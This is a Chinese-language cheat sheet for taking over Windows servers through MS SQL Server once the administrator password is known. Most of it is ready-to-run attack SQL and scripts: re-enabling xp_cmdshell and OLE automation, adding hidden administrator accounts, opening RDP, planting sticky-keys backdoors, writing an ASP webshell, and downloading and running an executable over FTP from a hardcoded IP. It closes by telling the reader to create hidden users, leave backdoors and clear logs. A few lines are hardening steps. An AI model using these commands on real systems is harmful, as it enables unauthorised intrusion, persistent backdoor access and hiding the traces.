当你获得数据库的管理密码时,你还犹豫什么。提权吧、
注意SQLDebuggerr用户
echo y|cacls c:windowssystem32net1.exe /p everyone:f
=======================================================================
Error Message:未能找到存储过程 ‘master..xp_cmdshell’
修复法:很通用的,其实碰到 其他126 127的都可以一起修复,
除了xplog70.dll其他的都可以用这命令修复
第一步先删除:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc ‘xp_cmdshell’
第二步恢复:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
未能找到存储过程 ‘master..xp_cmdshell’
第一步:
create procedure sp_addextendedproc — 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call
/
@dllname varchar(255)/ name of DLL containing function /
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,’sp_addextendedproc’)
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) – sp_addextendedproc
GO
第二步:
EXEC sp_addextendedproc xp_cmdshell,@dllname =’xplog70.dll’declare @o int
=======================================================================
恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’
开启cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’
判断存储扩展是否存在
select count() from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’
返回结果为1就ok
=======================================================================
SQL Server 阻止了对组件 ‘xp_cmdshell’ 的 过程’sys.xp_cmdshell’ 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 ‘xp_cmdshell’。有关启用 ‘xp_cmdshell’ 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。
;EXEC sp_configure ‘show advanced options’, 1 –
;RECONFIGURE WITH OVERRIDE –
;EXEC sp_configure ‘xp_cmdshell’, 1 –
;RECONFIGURE WITH OVERRIDE –
;EXEC sp_configure   ‘show advanced options’, 0 –
=======================================================================
xplog70.dll修复:
Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。
修复XPLOG70.DLL(先用文件查看下备份的目录下x86bin,然后把下面目录替换)
第一步
exec sp_dropextendedproc ‘xp_cmdshell’
第二步
dbcc addextendedproc ("xp_cmdshell","c:sql2ksp4x86binnxplog70.dll")
=======================================================================
恢复扩展存储过程的办法
先恢复sp_addextendedproc,语句如下:
第一:
create procedure sp_addextendedproc — 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call / @dllname varchar(255)/ name of DLL containing function / as
set implicit_transactions off
if @@trancount > 0 
begin
raiserror(15002,-1,-1,’sp_addextendedproc’) 
return (1) 
end
dbcc addextendedproc( @functname, @dllname) 
return (0) – sp_addextendedproc
GO
第二:
use master 
exec sp_addextendedproc xp_cmdshell,’xp_cmdshell.dll’ 
exec sp_addextendedproc xp_dirtree,’xpstar.dll’ 
exec sp_addextendedproc xp_enumgroups,’xplog70.dll’ 
exec sp_addextendedproc xp_fixeddrives,’xpstar.dll’ 
exec sp_addextendedproc xp_loginconfig,’xplog70.dll’ 
exec sp_addextendedproc xp_enumerrorlogs,’xpstar.dll’ 
exec sp_addextendedproc xp_getfiledetails,’xpstar.dll’ 
exec sp_addextendedproc sp_OACreate,’odsole70.dll’ 
exec sp_addextendedproc sp_OADestroy,’odsole70.dll’ 
exec sp_addextendedproc sp_OAGetErrorInfo,’odsole70.dll’ 
exec sp_addextendedproc sp_OAGetProperty,’odsole70.dll’ 
exec sp_addextendedproc sp_OAMethod,’odsole70.dll’ 
exec sp_addextendedproc sp_OASetProperty,’odsole70.dll’ 
exec sp_addextendedproc sp_OAStop,’odsole70.dll’ 
exec sp_addextendedproc xp_regaddmultistring,’xpstar.dll’ 
exec sp_addextendedproc xp_regdeletekey,’xpstar.dll’ 
exec sp_addextendedproc xp_regdeletevalue,’xpstar.dll’ 
exec sp_addextendedproc xp_regenumvalues,’xpstar.dll’ 
exec sp_addextendedproc xp_regread,’xpstar.dll’ 
exec sp_addextendedproc xp_regremovemultistring,’xpstar.dll’ 
exec sp_addextendedproc xp_regwrite,’xpstar.dll’ 
exec sp_addextendedproc xp_availablemedia,’xpstar.dll’
————————————————————————————–
一.更改sa口令方法:
用sql综合利用工具连接后,执行命令:
exec sp_password NULL,’新密码’,’sa’
(提示:慎用!)
二.简单修补sa弱口令.
方法1:查询分离器连接后执行:
if exists (select * from
dbo.sysobjects where id = object_id(N’[dbo].[xp_cmdshell]’) and
OBJECTPROPERTY(id, N’IsExtendedProc’) = 1)
exec sp_dropextendedproc N’[dbo].[xp_cmdshell]’
GO
然后按F5键命令执行完毕
方法2:查询分离器连接后
第一步执行:use master
第二步执行:sp_dropextendedproc ‘xp_cmdshell’
然后按F5键命令执行完毕
无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:sp_dropextendedproc "xp_cmdshell"
第二步执行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法:查询分离器连接后,
第一步执行:exec sp_dropextendedproc ‘xp_cmdshell’
第二步执行:exec sp_addextendedproc ‘xp_cmdshell’,’xpweb70.dll’          
然后按F5键命令执行完毕
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:winntsystem32cmd.exe /c net user Web hacker /add’
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:winntsystem32cmd.exe /c net localgroup administrators Web /add’
xp或2003server系统: 126错误!命令
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:windowssystem32cmd.exe /c net user Web$ hacker /add’
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:windowssystem32cmd.exe /c net localgroup administrators Web$ /add’
=======================================================================
找不到存储过程 sp_addextendedproc
解决方法:
create procedure sp_addextendedproc — 1996/08/30 20:13
@functname nvarchar(517),/ (owner.)name of function to call /
@dllname varchar(255)/ name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,’sp_addextendedproc’)
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) – sp_addextendedproc
GO
这段代码贴入查询分离器,执行
查看目录
exec master.dbo.xp_subdirs ‘c:’
列出磁盘
e
xec master..xp_fixeddrives
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行) 直接加帐号!
EXEC master.dbo.xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SoftWareMicrosoftJet4.0Engines’,’SandBoxMode’,’REG_DWORD’,0
Select * From OpenRowSet(‘Microsoft.Jet.OLEDB.4.0’,’;Database=c:windowssystem32iasias.mdb’,’select shell("net user 123 123 /add")’);
Select * From OpenRowSet(‘Microsoft.Jet.OLEDB.4.0’,’;Database=c:windowssystem32iasias.mdb’,’select shell("net localgroup administrators 123 /add")’);
=======================================================================
开3389:
exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal Server’,’fDenyTSConnections’,’REG_DWORD’,0;–
关3389:
exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal Server’,’fDenyTSConnections’,’REG_DWORD’,1;
查看3389端口
exec xp_regread ‘HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp’,’PortNumber’
普通CMD后门
xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe’,’debugger’,’reg_sz’,’c:windowssystem32cmd.exe’
建立用户1-这里默认用户是Reconditeness密码9527可自行修改
select * from openrowset(‘microsoft.jet.oledb.4.0’,’;database=c:winntsystem32iasias.mdb’,’select shell("cmd.exe /c net1 user Reconditeness 9527 /ad &net localgroup administrators terks /ad")’)
select * from openrowset(‘microsoft.jet.oledb.4.0’,’;database=c:windowssystem32iasias.mdb’,’select shell("cmd.exe /c net1 user Reconditeness 9527 /ad &net localgroup administrators terks /ad")’)
win2K直接上PS马
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftJet4.0Engines’,’SandBoxMode’,’REG_DWORD’,1
select * from openrowset(‘microsoft.jet.oledb.4.0’,’;database=c:winntsystem32iasias.mdb’,’select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt&@echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")’)
win03-XP直接上PS马
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftJet4.0Engines’,’SandBoxMode’,’REG_DWORD’,1
select * from openrowset(‘microsoft.jet.oledb.4.0’,’;database=c:windowssystem32iasias.mdb’,’select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt&@echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")’)
shift后门命令
declare @o int
exec sp_oacreate ‘scripting.filesystemobject’, @o out
exec sp_oamethod @o, ‘copyfile’,null,’c:windowsexplorer.exe’ ,’c:windowssystem32sethc.exe’;
declare @o int
exec sp_oacreate ‘scripting.filesystemobject’, @o out
exec sp_oamethod @o, ‘copyfile’,null,’c:windowssystem32sethc.exe’ ,’c:windowssystem32dllcachesethc.exe’;
copy c:windowsexplorer.exe c:windowssystem32sethc.exe
copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe
declare @o int
exec sp_oacreate ‘wscript.shell’, @o out
exec sp_oamethod @o, ‘run’, NULL, ‘XXXXX’ XXXXX为你要执行的命令
开3389
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
SQL写一句话
exec master.dbo.xp_subdirs ‘d:webcdlxkj’;
exec sp_makewebtask ‘d:webcdlxkjXX.asp’,’select’’<%execute(request("SB"))%>’’ ‘
SA沙盒模式提权—–
———————-
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftJet4.0Engines’,’SandBoxMode’,’REG_DWORD’,0;
——————————————————-
Select * From OpenRowSet(‘Microsoft.Jet.OLEDB.4.0’,’;Database=c:windowssystem32iasias.mdb’,’select shell("net user sql$ 123 /add")’);
——————————————————-
Select * From OpenRowSet(‘Microsoft.Jet.OLEDB.4.0’,’;Database=c:windowssystem32iasias.mdb’,’select shell("net localgroup administrators sql$ /add")’);
SHIFT
入侵
EXEC master..xp_regwrite
@rootkey=’HKEY_LOCAL_MACHINE’,
@key=’SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.EXE’,
@value_name=’Debugger’,
@type=’REG_SZ’,
@value=’C:WINDOWSexplorer.exe’
整个过程是利用master..xp_regwrite这组件来完成的,
1.sql命令查询注册表粘滞键是否被劫持
exec master..xp_regread ‘HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe’,’Debugger’
2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)
xp_regwrite ‘HKEY_LOCAL_MACHINE’, ‘SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe’,
‘Debugger’,’REG_SZ’,’C:WINDOWSsystem32taskmgr.exe’
3.sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用
xp_regdeletekey ‘HKEY_LOCAL_MACHINE’, ‘SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe’
sql写文件
declare @o int, @f int, @t int, @ret int
exec sp_oacreate ‘scripting.filesystemobject’, @o out
exec sp_oamethod @o, ‘createtextfile’, @f out, ‘c:1.vbs’, 1
exec @ret = sp_oamethod @f, ‘writeline’, NULL,’set wsnetwork=CreateObject("WSCRIPT.NETWORK")’
exec @ret = sp_oamethod @f, ‘writeline’, NULL,’os="WinNT://"&wsnetwork.ComputerName’
exec @ret = sp_oamethod @f, ‘writeline’, NULL,’Set ob=GetObject(os)’
exec @ret = sp_oamethod @f, ‘writeline’, NULL,’Set oe=GetObject(os&"/Administrators,group")’
exec @ret = sp_oamethod @f, ‘writeline’, NULL,’Set od=ob.Create("user","test")’
exec @ret = sp_oamethod @f, ‘writeline’, NULL,’od.SetPassword "1234"’
exec @ret = sp_oamethod @f, ‘writeline’, NULL,’od.SetInfo ‘
exec @ret = sp_oamethod @f, ‘writeline’, NULL,’Set of=GetObject(os&"/test",user) ‘
exec @ret = sp_oamethod @f, ‘writeline’, NULL,’oe.add os&"/test"’
exec master..xp_cmdshell ‘cscript c:1.vbs’
无NET提权的脚本
struser=wscript.arguments(0)
strpass=wscript.arguments(1)
set lp=createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",struser)
od.SetPassword strpass
od.SetInfo
Set of=GetObject(oz&"/" & struser & ",user")
oe.Add(of.ADsPath)
For Each admin in oe.Members
if struser=admin.Name then
Wscript.echo struser & " 建立成功!"
wscript.quit
end if
Next
Wscript.echo struser & " 用户建立失败!"
将以上保存为user.VBS文件
然后执行:cscript user.vbs 用户名 密码
=======================================================================
恢复xp_cmdshell
exec sp_dropextendedproc ‘xp_cmdshell’
EXEC sp_addextendedproc xp_cmdshell,@dllname =’xplog70.dll’declare @o int
=======================================================================
开启xp_cmdshell
USE master
EXEC sp_configure ‘show advanced options’, 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure ‘xp_cmdshell’, 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure ‘show advanced options’, 0
=======================================================================
开启Automation Procedures
USE master
EXEC sp_configure ‘show advanced options’, 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure ‘Ole Automation Procedures’,1
RECONFIGURE WITH OVERRIDE
EXEC sp_configur
e ‘show advanced options’, 0
=======================================================================
开启Distributed Queries
USE master
EXEC sp_configure ‘show advanced options’, 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure ‘Ad Hoc Distributed Queries’,1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure ‘show advanced options’, 0
=======================================================================
恢复Xp_regwrite
EXEC sp_dropextendedproc ‘Xp_regwrite’
exec sp_addextendedproc xp_regwrite,’xpstar.dll’
=======================================================================
恢复sp_OACreate
dbcc addextendedproc ("sp_OACreate","odsole70.dll")
exec sp_addextendedproc sp_OAMethod,’odsole70.dll’
=======================================================================
cmdshell开3389
exec master..xp_cmdshell ‘echo Windows Registry Editor Version 5.00>c:3389.reg’
exec master..xp_cmdshell ‘echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]>>c:3389.reg’
exec master..xp_cmdshell ‘echo "fDenyTSConnections"=dword:00000000>>c:3389.reg’
exec master..xp_cmdshell ‘regedit /s c:3389.reg’
exec master..xp_cmdshell ‘del c:3389.reg’
=======================================================================
cmdshell添加用户
insert resultcmd_cc exec master..xp_cmdshell ‘net user 用户 密码 /add’
insert resultcmd_cc exec master..xp_cmdshell ‘net user 用户 密码’
insert resultcmd_cc exec master..xp_cmdshell ‘net user 用户 /active:yes’
insert resultcmd_cc exec master..xp_cmdshell ‘net localgroup administrators 用户 /add’
=======================================================================
oacreate添加用户
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [net user support$ support /add]
EXEC sp_oamethod @s,[run], NULL, [net localgroup administrators support /add]
=======================================================================
regwrite添加用户
Exec master.dbo.xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftJet4.0Engines’,’SandBoxMode’,’REG_DWORD’,0
select * from openrowset(‘microsoft.jet.oledb.4.0’,’;database=iasdnary.mdb’,’select shell("net user 用户 密码 /add")’)
select * from openrowset(‘microsoft.jet.oledb.4.0’,’;database=iasdnary.mdb’,’select shell("net localgroup administrators 用户 /add")’)
=======================================================================
cmdshell模式FTP下载:
insert resultcmd_cc exec master..xp_cmdshell ‘cmd /c echo open FTP地址>sly.sys’
insert resultcmd_cc exec master..xp_cmdshell ‘cmd /c echo 123 >>sly.sys’
insert resultcmd_cc exec master..xp_cmdshell ‘cmd /c echo 123 >>sly.sys’
insert resultcmd_cc exec master..xp_cmdshell ‘cmd /c echo get 1433.exe sly.exe>>sly.sys’
insert resultcmd_cc exec master..xp_cmdshell ‘cmd /c echo bye >>sly.sys]’
insert resultcmd_cc exec master..xp_cmdshell ‘cmd /c ftp -s:sly.sys’
insert resultcmd_cc exec master..xp_cmdshell ‘cmd /c del sly.sys’
insert resultcmd_cc exec master..xp_cmdshell ‘cmd /c sly.exe’
=======================================================================
oacreate模式FTP下载:
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [cmd /c echo open FTP地址>sly.sys]
EXEC sp_oamethod @s,[run], NULL, [cmd /c echo 123 >>sly.sys]
EXEC sp_oamethod @s,[run], NULL, [cmd /c echo 123 >>sly.sys]
EXEC sp_oamethod @s,[run], NULL, [cmd /c echo get 1433.exe sly.exe>>sly.sys]
EXEC sp_oamethod @s,[run], NULL, [cmd /c echo bye >>sly.sys]
EXEC sp_oamethod @s,[run], NULL, [cmd /c ftp -s:sly.sys]
EXEC sp_oamethod @s,[run], NULL, [cmd /c del sly.sys]
EXEC sp_oamethod @s,[run], NULL, [cmd /c sly.exe]
=======================================================================
不需要XP_CMDSHLL执行CMD命令
exec master.dbo.xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftJet4.0Engines’,’SandBoxMode’,’REG_DWORD’,1
select * from openrowset(‘microsoft.jet.oledb.4.0’,’;database=c:winntsystem32iasias.mdb’,’select shell("cmd.exe /c net user 用户 密码 /add.")’)
exec master.dbo.xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftJet4.0Engines’,’SandBoxMode’,’REG_DWORD’,1
select * from openrowset(‘microsoft.jet.oledb.4.0’,’;database=c:winntsystem32iasias.mdb’,’select shell("cmd.exe /c net localgroup administrators 用户 /add.")’)
=======================================================================
SQL Server 阻止了对组件 ‘Ole Automation Procedures’ 的 过程’sys.sp_OACreate’ 的访问
sp_configure ‘show advanced options’, 1;
GO
RECONFIGURE;
GO
sp_configure ‘Ole Automation Procedures’, 1;
GO
RECONFIGURE;
GO
=============================================
错误5是个系统提示的错误号,CreateProcess这个是创建线程的意思,这个错误产生和系统文件cmd.exe有很大的关系,一种情况是cmd被删除,一种是cmd的权限被降低了.
SQL查看终端端口及开放情况:
exec master..xp_regread ‘HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp’,’PortNumber’
好了,下面关键的地方了,要用到两条sql指令,将系统的explorer文件复制为系统的shift后门文件,下面两条语句为分别执行的,不可以放在一起执行,我是在sql tools 2.0工具里执行的,你也可以在分离器中执行,记得分别执行。
//这条语句将explorer.exe复制为sethc.exe
declare @o int exec sp_oacreate ‘scripting.filesystemobject’, @o out exec sp_oamethod @o, ‘copyfile’,null,’c:windowsexplorer.exe’,’c:windowssystem32sethc.exe’;
//这条语句将sethc.exe复制到dllcache目录下
declare @oo int exec sp_oacreate ‘scripting.filesystemobject’, @oo out exec sp_oamethod @oo, ‘copyfile’,null,’c:windowssystem32sethc.exe’,’c:windowssystem32dllcachesethc.exe’;
这个两条语句执行的时间间隔最好不超过10秒钟,否则系统会自动恢复原来的文件。
另外这两条语句使用到的sp_oacreate存储过程需要使用到odsole70.dll这个文件,所以这个文件的存亡,关系到创建的成功与否。
=======================================================================
删除:
use master
exec sp_dropextendedproc ‘xp_cmdshell’
exec sp_dropextendedproc ‘xp_dirtree’
exec sp_dropextendedproc ‘xp_enumgroups’
exec sp_dropextendedproc ‘xp_fixeddrives’
exec sp_dropextendedproc ‘xp_loginconfig’
exec sp_dropextendedproc ‘xp_enumerrorlogs’
exec sp_dropextendedproc ‘xp_getfiledetails’
exec sp_dropextendedproc ‘Sp_OACreate’
exec sp_dropextendedproc ‘Sp_OADestroy’
exec sp_dropextendedproc ‘Sp_OAGetErrorInfo’
exec sp_dropextendedproc ‘Sp_OAGetProperty’
exec sp_dropextendedproc ‘Sp_OAMethod’
exec sp_dropextendedproc ‘Sp_OASetProperty’
exec sp_dropextendedproc ‘Sp_OAStop’
exec sp_dropextendedproc ‘Xp_regaddmultistring’
exec sp_dropextendedproc ‘Xp_regdeletekey’
exec sp_dropextendedproc ‘Xp_regdeletevalue’
exec sp_dropextendedproc ‘Xp_regenumvalues’
exec sp_dropextendedproc ‘Xp_regread’
exec sp_dropextendedproc ‘Xp_regremovemultistring’
exec sp_dropextendedproc ‘Xp_regwrite’
drop procedure sp_makewebtask
go
———————————————————————————-
———————-
–列出当前计算机名称–
———————-
execute master..xp_getnetname
——————————–
-列出当前计算机的驱动器可用空间-
——————————–
execute master..xp_fixeddrives
========================
==列出服务器所有本地组==
========================
execute master..xp_enumgroups
======================
==获取MS SQL的版本号==
======================
execute master..sp_msgetversion
=========================================
==参数说明:目录名,目录深度,是否显示文件==
=========================================
execute master..xp_dirtree ‘c:’
execute master..xp_dirtree ‘c:’,1
execute master..xp_dirtree ‘c:’,1,1
——————————————————————————————————–
sql2005
恢复xp_cmdshell
EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;
关闭:
EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;
————————————————————————————————————-
把要转的文件拖到脚本上去, 就会生成包含HEX代码的文本.
然后用以下方法写入到对方计算机中。DECLARE @ObjectToken INT
EXEC sp_OACreate ‘ADODB.Stream’, @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken, ‘Type’, 1
EXEC sp_OAMethod @ObjectToken, ‘Open’
EXEC sp_OAMethod @ObjectToken, ‘Write’, NULL, 0x123456(其中0x123456为HEX内容)
EXEC sp_OAMethod @ObjectToken, ‘SaveToFile’, NULL, ‘Test.exe(文件名)’, 2
EXEC sp_OAMethod @ObjectToken, ‘Close’
EXEC sp_OADestroy @ObjectToken
复制代码写入之后, 就发挥你的办法去执行你写入的这个文件就OK了
FILE2HEX.VBS
On Error Resume Next
FilePath = Wscript.Arguments(0)
FieName = Right(FilePath, Len(FilePath) - InStrRev(FilePath, ""))
With CreateObject("Adodb.Stream")
.Type = 1: .open: .loadfromfile FilePath: Str = .read: Sl = LenB(Str)
End With
Sll = Sl Mod 65536: Slh = Sl 65536
With CreateObject("Scripting.FileSystemObject").OpenTextFile(FilePath & ".txt", 2, True)
.Write "0x"
For i = 1 To Sl
bt = AscB(MidB(Str, i, 1))
If bt < 16 Then .Write "0"
.Write Hex(bt)
Next
End With
进去服务器后,创建隐藏用户。防止后门,清理日志,走人。。
嘿嘿,最后嘱咐一下,缺德的时候别多做。。看看就行,,